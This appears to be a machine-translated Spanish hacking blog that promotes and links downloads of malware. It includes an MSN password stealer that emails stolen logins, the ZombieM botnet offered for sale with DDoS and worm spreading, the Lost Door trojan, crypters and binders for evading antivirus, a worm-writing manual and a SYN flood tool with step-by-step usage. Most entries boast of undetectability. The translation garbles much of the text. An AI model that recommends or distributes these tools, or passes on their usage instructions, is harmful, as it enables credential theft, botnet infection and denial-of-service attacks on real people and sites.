Diamond Binder
Diamond Binder is a binder bid for source created by sharky, the tool possesses the functions basicas of any binder. This in Spanish and is very facil to use.
The codigo is included complete source of the stub and of the builder (VB6), the codigo is clean and simple, ideal for the ones that they are learning to plan.
To the binder I detect him me Avira, but I am attacked NOD32 and KAV, surely is undetectable to the mayoria of the antivirus in the I gave of today.
You unload
Diamond Binder (rapidshare)
Diamond Binder (megaupload)
Diamond Binder codigo source (rapidshare)
Diamond Binder codigo source (mediafire)
PD: I go, I return Monday, and I do not think to approach a pc, therefore the comments were not brought up to date until return.
AMSNPS is a stealer simple created today by Arhack that sends for email the users and passwords avoided any version of MSN messenger.
Way of use basico
The alone program functions with accounts of gmail, since uses its servant smtp to send the emails, the user should be placed and password of an account gmail that was used for send the data, bearing a grudge to create an account exclusively for this.
The email with the passwords can be sent to any type of direccion.
Before creating the servant bearing a grudge to use the boton "to Test" to see if are well the data of configuration.
When they place the data of I send they give click to "to Create" and a new file was generated msnstealer.exe, this is the one that should be executed so that the data be sent.
The program obiamente alone sends the users and passwords kept (with recalling password) of msn, if itself is not found ningun user or password kept was sent an alone blank message with the info of the pc and the hour.
In the following image is seen that the server was executed in several pcs, in the holder of the message name of the pc is included and active user, in the message the data of users and passwords.
The server
The server is not added to the start, does not create files, neither modifies the registration, in conclusion does not modify absolutely nothing in the PC, upon executing it tries to send instantaneamente the data, once sends the data closes automaticamente. If it fails upon sending the data because there is not conexion to internet or any another motive reattempts to being sent the message. Upon I giving of today is undetectable to all the known antivirus, although I do not believe that time last long.
Arhack MSN Password stealer 1,0 Beta (rapidshare)
Arhack MSN Password stealer 1,0 Beta (megaupload)
Pass: troyanosyvirus. com. ar
RunPE killer is a desempaquetador generico - created by Psymera - for programs that utilize the I modulate RunPE.
RunPE is utilized in the great mayoria of encriptadores, joiners, binders, etc, all them published in TYV they utilize it. It is utilized generally to execute a file encrypted in memory already desencriptado, without have that dropear the file desencriptado in the disk rigido.
With RunPE Killer can unpack the file encrypted to obtain the original file or desencriptado. Subsequently the file can be analyzed desencriptado.
RunPE Killer was tested with the following encriptadores and I function with all:
abstract
ACrypter 5 - By AdRi4N
Anti Nod-32 Crypter
area 51 crypter
Basic - Crypter v1.3 (Mod bob & D@rB-15)
BlueMorph-mod by legionpr and depuniet and fexx
Carb0n crypter 1,7 [fix]
Carb0n Crypter Mod by demonio666vip
Clown Crpter By dehombreadios
Countach (MOD by Hcinou)
Crypter By SuSo_v1_gracias_SkyWeb
DB Crypter v2.0 Mod Wally
DB cRYPTER ((((mod poison hacker)))
DonFelipe
Elite Packer
fexx cryptermod by linuxfer
HH-Crypter_Mod_By_J.V.B_
Ilusion crypter fixed!!
Undetectable Crypter 1.2b-(MOD POISON)-
Undetectable Krypt3r--MOD POISONHACKER
jodedor crypter mod by fexx
Kaka Crypter logan UPDATE 2
Level-23 Crypter (((MOD POISON ))))))
m3m0's Crypter reMod linuxfer
Madness Crypter mod by blackmaster1212
NT Crypter 2 by Kerberos5
Panther crypter
Panther Crypter fexx mod
RDG Tejon Crypter v0.8 Public Version
Represent Of Undetectable (semi fud mod LEGIONPR)
Rockito crypter xD
Schwarze Crypter Mod Logan
Schwarze Sonne Crypter Mod by likor
SiMpL3 CrYpT3R Mod by 1
simple crypter mod by fexx
Skull Crypter v2 By SuSaZo MOD By Depuniet
Skull_Crypter
Universal Crypter
Wolf Crypter 1.0.1
Wolf Crypter 1.0.2 100% FUD - FUCK AVIRA
Bearing a grudge to utilize alone in you plot virtual.
It unloads
RunPE Killer V. 1,0 By Psymera (rapidshare)
RunPE Killer V. 1,0 By Psymera (megaupload)
pass: troyanosyvirus. com. ar
PD: Adios RunPE! jaja
Nmap is a program created by Fyodor of open code, that serves to perform search of ports. It is used to evaluate the security of data processing systems, as well as for discover services or servants in a data processing network. Is one of the tools basicas for any administrator of systems or hacker.
In this new one version 600 changes were carried out, they were corrected bugs and itself podria to say that is the first one version important despues of the first thrust in 1997.
Characteristic basicas of Nmap
-Discovery of servants: It identifies computers in a network, for example listing those that respond ping.
-It identifies open ports in an objective computer.
-It determines what services is executing the same one.
-To determine what operating system and version utilizes happiness computer, (this technique is also known as fingerprinting).
-It obtains some characteristics of the hardware of network of the machine object of the test.
The main improvements in the version 5,0 of NMap (by the community dragonjar.org)
-Inclusion of the new tool NCAT (as a netcat but improved)
-It added the tool of comparison of escaneos Ndiff (to see changes among I scan and I scan)
-Improvement of the performance (notably)
-The official guide has been published “Nmap Network Scanning”
-New motor Nmap Scripting Engine (NSE) permits us to write and to share scripts that automate tasks.
To continuacion abandonment the discharges of the binary one with the interface grafica Zenmap so that be but facil to use, but in their official web they can find all the discharges for the different I AM, ademas to find the codigo source, and other versions.
It unloads
Nmap 5,0 win32 binary (rapidshare TYV)
Pass: troyanosyvirus. com. ar
Nmap 5,0 win32 binary (paginates official)
All the discharges: http://nmap.org/download.html
Informacion
Guide of reference of Nmap (Page of manual)
Officialweb: www.nmap.org
ZombieM Bot is a new bot planned by Arhack, designed to test the security of networks and to administer pcs low operating system Windows of massive and remote form.
Tasks
One of the caracteristicas that do that ZombieM be emphasized of the remainder is the great quantity of tasks that can carry out and the effectiveness of the same, to continuacion they were explained briefly the but important.
Functions Basicas
ZombieM bot possesses the functions basicas to administer the files of the pcs connected:
-To discharge file / to Discharge and to execute
-To execute file / Commands
-To create folders
-To erase file
-To erase folder
-It generates files with content (bat, txt, inf, reg, etc)
-To bring up to date servant
Passwords
ZombieM captures and keeps the passwords of:
-All the versions of MSN messenger
-Firefox 3
-Internet Explorer 6 and 7 (using plugin)
Spread - Propagacion
-Propagacion P2P: It copies to the folders to share of the programs P2P but acquaintances (Till, rival, limewire, etc).
It detects the folders to share since the registration of Windows, and copy an user-defined file -that can be dischargeed for the same one- or the same one bot. The name of the file can be written to share.
-Propagacion MSN: It sends messages to all the contacts of the MSN of the bots connected. The user writes the message that wants to send and the interval of time that delays in sending the message between contact and contact.
-Propagacion USB/DISKS: Copies to all the disks extraibles and local: Pendrives, mp3, mp4, cell, camaras, memories, etc.
-Propagacion LAN: It detects 3 types of vulnerabilities in the network of the bot they connected and you take advantage of happinesses vulenrabilidades to be copied to the pcs of that network, for example by Netbios.
Creacion of Scripts (batch, VBS, etc)
ZombieM permits to create script of any type as for example in batch or visual basic script for despues to execute them.
MSN
-It adds contacts
-Changes nicks
-It obtains informacion of MSN -Account, quantity of contacts, state, IP-
-It sends messages
Works with an Api MSN compatible with all the versions from the 4,0
Mailing lists
ZombieM obtains all the contacts of the MSN messenger of all the contacts and the guard in a file to send mail, or for what desire the user.
It modifies file Hosts
ZombieM detects the ubicacion of the file Hosts of Windows and modifies it to flavor of the user so that the pcs upon entering to certain you paginate webs redirect them to another or simply to avoid that they enter in said web. It can be used in a business so that the employees upon entering to a web prohibited by the business be redirected to another web, or so that children enter not to you paginate webs for adults.
Using this task for other end can be illegal in some countries, and alone the user of the bot holds responsible himself of said act.
DDOS - Attack distributed of denegacion of service
ZombieM possesses a http flood very powerful to saturate the conexion of you paginate webs and asi to throw them.
Using alone to test the own connections and to improve the protections of the servant or for know if another servant should be used. Use it to throw you paginate webs of the competence or similar he can be illegal in some countries, and alone the user of the bot holds responsible himself.
Other tasks
-Shell remote
-To visit web in close-up
-To send messages
-Options of servant: Bringing up to date, reconectar, to disconnect, to close, to eliminate.
-And but..
The bot or servant
-Stability and velocity maxima, if itself not the conexion with the client is established reconecta in alone some seconds. I send of data instantaneamente. Stable in all the known versions of Windows.
-Undetectable to the antivius and firewalls but acquaintances: NOD32, AVG, Kaspersky, Mcafee, Microsoft, Norton, Avira, etc.
-The bot is installed in 2 different places from the pc, and creates entrances in the registration to be initiated with Windows. It changes his ubicacion and his form to be installed if the user possesses privileges of administrator or not.
-Encriptacion advanced utilizing 2 metodos different from encriptacion for all the vital chains of the bot, like data of ips, ports of conexion, names, etc. Almost impossible of desencriptar (for say not impossible).
-It possesses a very good configuration; can be selected 2 controls or ips and different ports, by if fails some. Possibility to configure data of conexion, places where copies, where is added to the registration, etc.
It bears Mutex, to avoid that different bots they be executed in a same pc, can change the mutex for control that bot should be executed.
Tambien permits to execute a paginates web upon being executed the bot.
-The weight of the bot complete is of~ 109Kb complete with all its tools and without compressing. It compressed weighs so alone~ 37Kb.
Maxima compatibility
ZombieM is compatible with the great mayoria of systems Windows: XP, View, 7 (seven), 2000, 98, ME, etc.
Does not it require privileges of administrator, functions perfectly in an account of User or Administrative.
Commands automaticos
ZombieM bot can send commands automaticos each specific time, to all the bots or simply to them selected (by countries, version, etc).
Tambien sends commands to the bots that are connected.
System of conexion and control of pcs
The pcs are connected directly the client of the ZombieM, or by means of a proxy (bearing a grudge ZM proxy) and simple commands are controlled by means of or by means of a board of tasks grafico of facil interpretacion.
It can be operated to all the pcs at the same time, or tambien can be operated of form segmented, by pies, version, state, ip, state, etc.
Estadisticas and logs
ZombieM generates logs of all the tasks carried out, guard all the data received, ips that enter, account pcs by countries, and a lot but ademas to count connections, disconnections by mistake or not, etc.
It can keep all in files. txt to revise subsequently and to compare them for obtain own conclusions.
Backup tecnico
If you need aid with the ZombieM do not doubt in contacting me, I helped you in which need.
And a lot but...
It selects bots automaticamente, filter of pcs by ips, exports all kinds of informacion in files. HTML, guard informacion, listens in 3 different ports at the same time, etc
You want to add him or to remove him something?
There is not problem, you contact me and we speak.
Legal notice
ZombieM was designed to use it alone in pcs with autorizacion of its respective owners. And it should not be used for end that can cause algun damage to some person or object. Therefore the author of the program neither nobody blames himself for evil use of this tool.
You buy
ZombieM bot 2,0 has a cost of CANCELED that they are paid by means of western union, with the purchase the ZombieM is included bot 2,0 complete without limit to use in any PC and 2 undetectable servants to the antivirus but acquaintances and but. Servants and clients can be used in infinite pcs.
If these it interested in the purchase sends a mail to ventas.tyv@gmail.com and I contacted you to the brevity, do not doubt in asking the questions that want.
The complete product is sent 1 I gave despues of to have received the money.
Price: SALES CANCELED
Middle of payment: Western union
Contact: ventas.tyv@gmail.com
SALES CANCELED
Source Undetector is an aplicacion planned by mFmTGL to leave undetectable and to encrypt other applications planned in visual basic 6.
General characteristics:
Advanced Browsing: This permits us one more easy edition of sources, thanks to the intuitive menu seemed to that of Visual Basic located in the frame Browse Project
Syntax Publishing: Something that could not lack, tambien gives us more comfort due to that is similar to that of Visual Basic.
Beautiful Design: For comfort of the users a very pleasant design has done itself, with icons, images, buttons 3D, etc.
Update Checker: Optional, what causes is to verify if we desire if there is a new version.
Characteristics for indetectar by hand:
Scramble Code: An option that upsets the lineas. This is to do it with the statements API, since if itself does not have experience and is carried out in a code the program can remain not functional. (Use: Selecting Lineas --> Click Right --> Scramble Line Order)
Complex Code: To my opinion the best function of all, the Complex Code. What does this option is to do "RIT" with each one of the lineas they selected thanks to the function GOTO. It adds also Junk Code to be jumped the heuristics. (Use: Selecting Lineas --> Click Right --> Complex Code (Goto' s))
String to Chr: What does this function is to transform characters the string selected, is to be jumped the detection of Strings of some antivirus. (Use: Selecting the string since the "to the other" --> Click Right --> String to CHR)
String to be Reviewed: Similar to the alone, upper function that passes the string to the Revs and then by the funcion StrReverse returns it to original state. (Use: Selecting the string since the "to the other" --> Click Right --> String to be Reviewed)
Encrypt String: What does this function is to encrypt the string with Xor with a key to election. (Use: Selecting the string since the "to the other" --> Click Right --> Encrypt String --> to Select Key --> to Accept. Later add in some module the function XOR doing click right and touching Add Xor Function)
Add Junk Code: This function adds code trash in a part of the code desired. (Use: The cursor in a linea blank where is put was inserted the code trash, is done click in her and then click right --> Add Junk Code)
Characteristics to locate firms:
Comment Line: This option what causes is to comment the lineas desired, that is to say, that upon compiling the project this code not basket placed in the binary one. Though not the function function that itself comment, serves to locate the firm. (Use: Selecting lineas desired since the principle --> Click Right --> Comment Line).
UnComment Line: This does exactly it opponent to the upper thing, descomenta the lineas selected. (Use: Selecting lineas desired since the principle --> Click Right --> UnComment Line).
Characteristics for indetectar (Semiautomatic Processes for ALL the project)
Crypt all strings: Very but very useful. What causes is to encrypt ALL THE STRINGS of the project permitting to select the key. Does not it encrypt API' s, this facilitates that is not needed verification but an automatic process is done. (Use: Click in Crypt all strings --> to Select the Key --> Click in Re-Encrypt Strings --> Click in Confirm)
Be reviewed all strings: Similar to the alone, upper function that passes the string to the Revs and then by the funcion StrReverse returns it to original state. (Use: Click in being Reviewed all strings --> Click in Confirm)
All Strings to Char: What does this function is to transform characters all the strings, is to be jumped the detection of Strings of some antivirus. (Use: Click in All strings to Char --> Confirm)
Randomize Function Names: Is also of the functions that more i they like. What causes is to change the name of ALL the functions. It NOTES: Not of the SUBS. (Use: Click in Randomize Function Names --> Confirm)
Add Modulate: I like a lot also, adds modulos to the project.
Add Class Modulate: It does the same thing that that of up, alone that adds Modules of class.
It notes: is asked the please contribute suggestions and to report the bugs that be found.
For the correct use of the application is needed to register the ocx. Carry out to register the ocx that come inside the folder OCX.
Any doubt on this to notify.
In it personnel bearing a grudge to create in its disk a called folder OCX and there to move the content and to execute the register.exe and clickear the boton of Register.
Source Undetector 0,1 (rapidshare)
Source Undetector 0,1 (megaupload)
pass: troyanosyvirus. com. ar
Today I gave salio the new one version of the Lost door, the v4.0 for, a Trojan with many tools.
In this new one version I am added a spread MSN automatico, obtains the active window, I improve themselves the GUI, and "they say" that I improve themselves the stability.
The Trojan is characterized for his 3 spreads, P2P, MSN, and USB. His GUI is very simple and ademas this in Spanish, asi that deberia to be facil to utilize it.
Caracteristicas official:
[+] To be Reviewed Connection
[+] Webcam Shot
[+] You Give you& swindle Manger
[+] printer
[+] Control pannel
[+] Pc control
[+] Exucutor
[+] Two command
[+] Windows manager
[+] Screen Shot
[+] Remote server manager
[+] Server to remove
[+] Ip Graber
[+] Server Downloader
[+] Icon Changer
[+] Audio Streaming
[+] Encrypt Settings
[+] Volume Control
[+] Connection Logs
[+] Instaled Appliction
[+] Infect All USB
[+] P2P Spreading
[+] Msn Spreading
[+] Multilanguage
[+] Services Viewer
[+] Remote passwords
[+] MSN Controler
[+] Remote Shell
[+] Chat with server
[+] Send fake messages
[+] files manager
[+] Find files
[+] Change remote screen resolution
[+] Information about remote computer
[+] Clipboard manager
[+] IE options
[+] Running Process
[+] Troyanosyvirus. com. ar
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote Nat viewer
[+] Rmote Resotr Manager
[+] Added Some Graphics
[+] Some minor Bugs fixed
[+] Some Forms there you Are Been Modified
[+] News Navigator was Added
[+] Invisible in Searching Files
[+] Server Size (120kb)
¿My opionion?
A very complete Trojan in functions and tools, but little stable and sure, ademas does not function well in Windows view, it recomendaria alone as secondary Trojan.
It unloads
Lost door v 4,0 For (rapidshare)
Lost door v 4,0 For (megaupload)
pass: troyanosyvirus. com. ar
This it is a paper created by Hendrix for April black 2006 of the forum elhacker.net, in the manual is explained the concepts basicos to create a worm in visual basic 6, this very well explained, above all for the ones that recien they are initiated with the programacion.
Indicate
1. Things basicas of a good one Malware
2. Complicating the desinfeccion of the Worm
3. Propagacion by networks P2P
4. Propagacion by MSN
5. Encriptacion Anti-Huristica of the AV' s
6. You sign in the PC
7. Propagacion by e-mail (this even I have to learn it)
8. Infeccion of files. exe and files. rar
9. Sorpresitas in the code of the Worm
In the manual is a matter of explaining the principle of operation basico, but if they want that the worm function to the 100% one must improve the codigo a little, for example using variables of system, keeping in mind that not all the pcs have as language Spanish, one must do it compatible with Windows view, etc.
Tambien recomendaria to change the propagacion by MSN, using the Messenger API Type Library, with this tendria that to function well in all the pcs with Windows and msn live today in I gave. In THIS LINK they can see examples of the use of this api.
In short, they can improve him themselves muchisimas things, even to add him other metodos of propagacion as can be for USB, or by LAN that are very popular today in I gave.
It unloads
Creacion of worms in VB (rapidshare)
Creacion of worms in VB (megaupload)
Any doubt they comment it, and tell me if he likes this type of contribute.
Today salio a new tool of m3m0_11, the Jodedor 5x1, call 5x1, by the 5 tools that possesses in an alone one. Is a Crypter, joiner, downloader, packer.
Each one of its tools is quite complete in functions, for example in the binder permits to select where to extract, the metodo of ejecucion (permits to be injected in a process), time of wait, etc.
The 4 stubs are undetectable and they have a relatively small weight that patrols by the 11kb approximately.
The Jodedor 5x1 possesses the following tools:
Crypter: It encrypts files to protect it and to leave them undetectable.
Joiner: Joins 2 or but files in an unico file.
Downloader: It unloads one or but files and subsequently executes them.
EOF writter: It adds EOF to the file.
Packer: It compresses the file.
Upon I giving of today is undetectable, that last some you gave at least!
It unloads
Jodedor 5X1 v0.1 (rapidshare)
Jodedor 5X1 v0.1 (megaupload)
Control codejock (necessary)
pass: troyanosyvirus. com. ar
Pair by the web of the author: www.jodedorsoftware.tk
SYN Flood Two is a program created by defc0n1 to do Denials of service by means of flood of packages SYN. These packages SYN are petitions of connection, and they have IPs of false origin for which the connection never is carried out and remains to the wait. When thousands of petitions have been sent the servant remains paralyzed and he does not accept new connections.
Caracteristicas
- He Is a lot but effective when attacks since various points are done (DDoS)
- Upon having thousands of alone and false from IPs connection intents to have several true (those of the assailants) is very complicated that the IDS or the Administrator of the system can locate the real assailants.
- This it based on Nmap with the use of Decoys
- It Sends 115 SYN by each Scaneo, that is to say, approximately each second middle depending on the power of the computer and of the network.
Way of use
1- It Opens the program, and wait to that this loaded one of the all (delays a little because contains Nmap complete, and has to decompress and to charge all the files)
2- If it is the first time that you open it and do not have WinPcap installed will leave you the following notice:
((WARNING! It seems that you have not installed WinPcap. Its neccesary to run the Two, gave you want to install it now? And/N:))
We put AND, we give to enter and we install it
If you have it already installed give him to N and continuous
3- it says You that introduce the Target (objective), therefore put the IP (for example 192.168.1.1) or the DNS (http://www.sgae.es/) that want to attack.
4- you have to put the port to attack. If it is a Web is the Http (80), but if you want to attack another service as FTP (21) or Telnet (23) tendras that to put its port. Evidently, the port has to be open and to it listens.
5- When it put "DoSing the target; -)" and down the escaneos leave of Nmap constantly, already these attacking to it kills
Text written by the author defc0n1
The program should be used alone to test their own servants or networks, these attacks can be avoided.
Bearing a grudge to seek informacion on this type of two, they can see in wikipedia the operation basico: in Spanish or in English but but I specify.
It unloads
SYN Flood Two (rapidshare)
SYN Flood Two (megaupload)
pass: troyanosyvirus. com. ar